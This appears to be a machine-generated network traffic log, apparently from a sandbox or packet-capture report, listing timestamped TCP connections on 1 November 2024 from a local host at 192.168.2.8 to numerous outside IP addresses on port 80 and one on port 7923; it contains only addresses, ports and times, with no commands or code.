                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.805864096 CET5016580192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.805864096 CET5016580192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.810688972 CET805016547.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:23.810714960 CET805016547.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:24.152208090 CET805016444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:24.152548075 CET5016480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:24.158034086 CET805016444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:24.158612967 CET5016480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:24.339904070 CET5016680192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:24.344921112 CET805016672.52.178.23192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:24.345182896 CET5016680192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:24.345307112 CET5016680192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:24.345395088 CET5016680192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:24.350100994 CET805016672.52.178.23192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:24.350178003 CET805016672.52.178.23192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.156704903 CET805016672.52.178.23192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.156773090 CET5016680192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.156822920 CET5016680192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.161679029 CET805016672.52.178.23192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.274632931 CET805016547.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.275072098 CET5016580192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.280323982 CET805016547.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.280385017 CET5016580192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.289400101 CET5016780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.294289112 CET805016744.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.294464111 CET5016780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.294653893 CET5016780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.294693947 CET5016780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.299504042 CET805016744.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.299515963 CET805016744.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.317738056 CET5016880192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.322947025 CET805016872.52.178.23192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.323008060 CET5016880192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.323153973 CET5016880192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.323174953 CET5016880192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.328125000 CET805016872.52.178.23192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.328599930 CET805016872.52.178.23192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.955825090 CET805016744.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.957897902 CET5016780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.963140011 CET805016744.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.963263035 CET5016780192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.981178999 CET5016980192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.986090899 CET805016944.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.986160040 CET5016980192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.986335993 CET5016980192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.986371994 CET5016980192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.991152048 CET805016944.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:25.991164923 CET805016944.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.076756001 CET805016872.52.178.23192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.076824903 CET5016880192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.077121973 CET5016880192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.081923008 CET805016872.52.178.23192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.277780056 CET5017080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.282826900 CET805017044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.282910109 CET5017080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.283101082 CET5017080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.283123970 CET5017080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.287903070 CET805017044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.287928104 CET805017044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.646831989 CET805016944.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.647327900 CET5016980192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.652493954 CET805016944.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.652611971 CET5016980192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.663434982 CET5017180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.668318987 CET805017118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.668390036 CET5017180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.668587923 CET5017180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.668606043 CET5017180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.673439980 CET805017118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.673453093 CET805017118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.953288078 CET805017044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.953459024 CET5017080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.958894968 CET805017044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:26.961478949 CET5017080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:27.080370903 CET5017280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:27.085514069 CET805017218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:27.085578918 CET5017280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:27.085784912 CET5017280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:27.085807085 CET5017280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:27.090636015 CET805017218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:27.090656042 CET805017218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.114092112 CET805017118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.114245892 CET5017180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.119822025 CET805017118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.119891882 CET5017180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.130403042 CET5017380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.135247946 CET805017318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.135319948 CET5017380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.135458946 CET5017380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.135477066 CET5017380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.140232086 CET805017318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.140254974 CET805017318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.606256008 CET805017218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.607883930 CET5017280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.613692999 CET805017218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.615333080 CET5017280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.791680098 CET805017318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.795890093 CET5017380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.801295042 CET805017318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.801630020 CET5017380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.814033031 CET5017480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.819164038 CET805017444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.822611094 CET5017480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.822865009 CET5017480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.822880983 CET5017480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.827682018 CET805017444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.827697039 CET805017444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.834686041 CET5017580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.839615107 CET805017518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.839684963 CET5017580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.839945078 CET5017580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.839977980 CET5017580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.844829082 CET805017518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:28.844844103 CET805017518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.498615026 CET805017518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.498888016 CET5017580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.504190922 CET805017518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.506274939 CET5017580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.509543896 CET805017444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.510360003 CET5017480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.515752077 CET805017444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.515813112 CET5017480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.525234938 CET5017680192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.530112028 CET805017613.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.531693935 CET5017680192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.531856060 CET5017680192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.531881094 CET5017680192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.536802053 CET805017613.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.536817074 CET805017613.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.706212997 CET5017780192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.711267948 CET8050177172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.711338997 CET5017780192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.711550951 CET5017780192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.711631060 CET5017780192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.716603041 CET8050177172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:29.716619968 CET8050177172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:30.378443956 CET8050177172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:30.379674911 CET5017780192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:30.622596025 CET5017780192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:30.627682924 CET8050177172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:30.808357954 CET5017880192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:30.814167023 CET8050178172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:30.814250946 CET5017880192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:30.814416885 CET5017880192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:30.814476013 CET5017880192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:30.820717096 CET8050178172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:30.821250916 CET8050178172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.090044022 CET805017613.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.090202093 CET5017680192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.095707893 CET805017613.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.095782042 CET5017680192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.105647087 CET5017980192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.110733986 CET805017935.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.110812902 CET5017980192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.111000061 CET5017980192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.111037016 CET5017980192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.115919113 CET805017935.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.115979910 CET805017935.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.207113981 CET5017880192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.389152050 CET5018080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.394619942 CET805018054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.394726038 CET5018080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.394942999 CET5018080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.395015955 CET5018080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.399890900 CET805018054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.400109053 CET805018054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.943137884 CET805017935.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.943785906 CET5017980192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.949218035 CET805017935.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.951683044 CET5017980192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.961201906 CET5018180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.966159105 CET805018118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.966340065 CET5018180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.966496944 CET5018180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.966526031 CET5018180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.971330881 CET805018118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:31.971535921 CET805018118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:32.223628998 CET805018054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:32.223784924 CET5018080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:32.231184959 CET805018054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:32.231232882 CET5018080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:32.333206892 CET5018280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:32.339946985 CET805018244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:32.340882063 CET5018280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:32.341581106 CET5018280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:32.341592073 CET5018280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:32.346898079 CET805018244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:32.346918106 CET805018244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:32.487396955 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:32.492599964 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:32.758382082 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:32.760011911 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:32.765110970 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.013955116 CET805018244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.035325050 CET5018280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.040777922 CET805018244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.042321920 CET5018280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.401546955 CET805018118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.401892900 CET5018180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.407131910 CET805018118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.407191992 CET5018180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.424726009 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.429580927 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.444762945 CET5018380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.449609995 CET805018334.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.449678898 CET5018380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.449805975 CET5018380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.449861050 CET5018380192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.454994917 CET805018334.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.455257893 CET805018334.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.471345901 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.476438046 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.486938000 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.491944075 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.508433104 CET5018480192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.513807058 CET805018418.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.513876915 CET5018480192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.513986111 CET5018480192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.514015913 CET5018480192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.518872976 CET805018418.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.519779921 CET805018418.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.695442915 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.701298952 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.706135035 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.756603003 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.758282900 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.763262033 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.845956087 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.848151922 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:33.853146076 CET79234972762.60.190.120192.168.2.8
